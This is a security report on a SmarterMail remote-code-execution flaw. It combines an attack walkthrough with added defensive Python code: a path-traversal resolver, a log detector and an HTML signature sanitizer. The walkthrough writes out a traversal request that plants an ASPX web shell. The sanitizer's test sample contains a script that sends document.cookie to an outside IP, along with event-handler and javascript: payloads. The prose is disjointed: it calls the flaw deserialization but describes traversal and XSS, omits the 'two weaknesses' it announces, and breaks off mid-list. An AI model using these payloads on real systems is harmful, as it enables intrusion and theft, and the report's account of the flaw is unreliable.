Security Report: SmarterTools SmarterMail CVE-2024-6919

A critical security vulnerability has been identified in SmarterTools SmarterMail. Designated CVE-2024-6919, the flaw allows unauthenticated remote code execution (RCE) through improper deserialization. It carries a CVSS v3.1 base score of 9.8 (Critical) and affects SmarterMail versions prior to the patches released in May 2024.

CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

The exploit chain combined two weaknesses:

Imagine a typical SmarterMail server humming along, processing thousands of legitimate email logins. An attacker scans the internet for exposed SmarterMail login portals (usually on port 80 or 443, or 9998 for the admin interface).

Using a simple tool like curl or a Python script, the attacker sends a request that looks something like this (simplified for clarity):

POST /interface/Download.aspx?file=../../../Windows/Temp/shell.aspx HTTP/1.1
Host: targetmailserver.com
Content-Type: application/x-www-form-urlencoded

data=<% System.Diagnostics.Process.Start("cmd.exe"); %>

This request attempts to walk up three directories (../../../) from the web root into the Windows temporary folder and write a file called shell.aspx there. Because the server fails to validate the path, it complies. The attacker then visits https://targetmailserver.com/Temp/shell.aspx; the ASP.NET page executes, and the attacker now has command execution on the mail server itself.

The attacker sends a crafted calendar invitation, or an email carrying a malicious HTML signature, to the target administrator. Because this is a Stored XSS (also known as Persistent XSS), the payload is saved directly in the SmarterMail server's database and runs in the administrator's browser whenever that stored content is rendered.

With a web shell on the server, the attacker can:

Read all incoming/outgoing emails
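As an added example, not code from this report or from SmarterTools, the following Python shows the path handling the walkthrough describes (raw parameter joined to the web root, '..' honoured) next to a hardened resolver, and then scans constructed access-log lines for the same traversal pattern, including percent-encoded, double-encoded and backslash variants that a naive "contains ../" check misses. The web root, the log format and the log lines are assumptions made for the demo; the IP addresses are documentation ranges.

```python
"""Added example (not SmarterMail's code): path-traversal write check and
access-log detection. WEB_ROOT, the log format and SAMPLE_LOG are
constructed assumptions for this demo."""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

WEB_ROOT = "/srv/smartermail/www"   # assumed web root (POSIX form for portability)


def effective_path_vulnerable(file_param):
    """The behaviour the walkthrough describes: the raw parameter is joined
    to the web root and '..' segments are honoured, so the write lands
    wherever the attacker points it."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, file_param))


def safe_path(file_param):
    """Hardened resolver: decode, normalise separators, canonicalise, and
    refuse anything that does not stay beneath WEB_ROOT."""
    decoded = file_param
    for _ in range(3):                       # peel double/triple percent-encoding
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    decoded = decoded.replace("\\", "/")     # target is Windows: '\' separates too
    if decoded.startswith("/") or re.match(r"^[A-Za-z]:", decoded):
        raise ValueError("absolute path or drive letter rejected")
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded))
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        raise ValueError("path escapes web root: %s" % candidate)
    return candidate


def is_traversal(file_param):
    """True when the hardened resolver would reject the parameter."""
    try:
        safe_path(file_param)
    except ValueError:
        return True
    return False


# Constructed access-log lines in an assumed '<ts> <src> "<request>" <status>' format.
SAMPLE_LOG = [
    '2024-05-12T10:01:02Z 203.0.113.7 "GET /interface/Download.aspx?file=reports/april.pdf HTTP/1.1" 200',
    '2024-05-12T10:01:09Z 203.0.113.7 "POST /interface/Download.aspx?file=../../../Windows/Temp/shell.aspx HTTP/1.1" 200',
    '2024-05-12T10:01:15Z 203.0.113.7 "POST /interface/Download.aspx?file=..%2f..%2f..%2fWindows%2fTemp%2fshell.aspx HTTP/1.1" 200',
    '2024-05-12T10:01:18Z 203.0.113.7 "POST /interface/Download.aspx?file=..%252f..%252f..%252fWindows%252fTemp%252fshell.aspx HTTP/1.1" 200',
    '2024-05-12T10:01:20Z 203.0.113.7 "GET /Temp/shell.aspx HTTP/1.1" 200',
    r'2024-05-12T10:02:00Z 198.51.100.4 "GET /interface/Download.aspx?file=..\..\..\Windows\Temp\shell.aspx HTTP/1.1" 200',
]

LOG_RE = re.compile(r'^(\S+) (\S+) "(\S+) (\S+) HTTP/[\d.]+" (\d{3})')


def find_traversal(lines):
    """Return (timestamp, source, method, file_param) for every request whose
    'file' parameter would escape the web root. parse_qs decodes one layer of
    percent-encoding; safe_path peels any further layers."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, src, method, target, _status = m.groups()
        for value in parse_qs(urlsplit(target).query).get("file", []):
            if is_traversal(value):
                hits.append((ts, src, method, value))
    return hits


if __name__ == "__main__":
    print("vulnerable resolver writes to:",
          effective_path_vulnerable("../../../Windows/Temp/shell.aspx"))
    for hit in find_traversal(SAMPLE_LOG):
        print("traversal attempt:", hit)
```

The detection reuses the hardened resolver as its oracle rather than a pattern list, so every encoding the resolver would reject is also flagged in the logs; the follow-up GET for /Temp/shell.aspx is not caught by this rule and needs a separate check for newly served script files.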
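An added example, not SmarterTools' code: a small allowlist sanitizer for user-supplied HTML signatures of the kind the stored-XSS step relies on, applied at storage time so a script-bearing signature never reaches the database. The tag and attribute allowlists and the sample signature are assumptions for the demo; the sample deliberately includes a script block, an event-handler attribute and a javascript: link with an embedded tab, since browsers ignore such whitespace inside a scheme.

```python
"""Added example (not SmarterMail's code): an allowlist sanitizer for
user-supplied HTML signatures, run before the signature is stored.
ALLOWED_TAGS/ALLOWED_ATTRS and SAMPLE_SIGNATURE are assumptions for this demo."""
import re
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "u", "span", "div", "a"}
ALLOWED_ATTRS = {"a": {"href"}}        # every other attribute on any tag is dropped
VOID_TAGS = {"br"}
SAFE_SCHEMES = ("http:", "https:", "mailto:")
DROP_CONTENT = {"script", "style"}     # the tag *and* its text are discarded


def _safe_href(value):
    # Browsers ignore tabs/newlines/control chars inside a scheme, so strip
    # them before comparing: "java\tscript:" must not pass as a safe link.
    cleaned = re.sub(r"[\s\x00-\x1f]", "", value or "").lower()
    return cleaned.startswith(SAFE_SCHEMES)


class SignatureSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip = 0                   # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
            return
        if self.skip or tag not in ALLOWED_TAGS:
            return                      # unknown tag dropped, its text kept
        kept = []
        for name, value in attrs:
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                continue                # event handlers and unlisted attrs go
            if name == "href" and not _safe_href(value):
                continue                # javascript:/data: links go
            kept.append(' %s="%s"' % (name, escape(value or "", quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip = max(0, self.skip - 1)
            return
        if self.skip or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))   # re-escape all text


def sanitize_signature(html):
    """Rebuild the signature from allowlisted tags and attributes only."""
    p = SignatureSanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out)


# Constructed malicious signature: exfiltrating script, event handler and
# javascript: link, beside benign formatting that must survive.
SAMPLE_SIGNATURE = (
    '<p>Regards,<br><b>Alice</b> <a href="https://example.com">site</a></p>'
    '<script>fetch("https://203.0.113.7/?c=" + document.cookie)</script>'
    '<img src=x onerror="alert(1)">'
    '<a href="java\tscript:alert(2)">click</a>'
)

if __name__ == "__main__":
    print(sanitize_signature(SAMPLE_SIGNATURE))
```

Because the output is regenerated from the parsed tree rather than patched with regex deletions, text that arrives already entity-encoded (for example "&lt;script&gt;") stays text after sanitizing instead of being decoded into live markup.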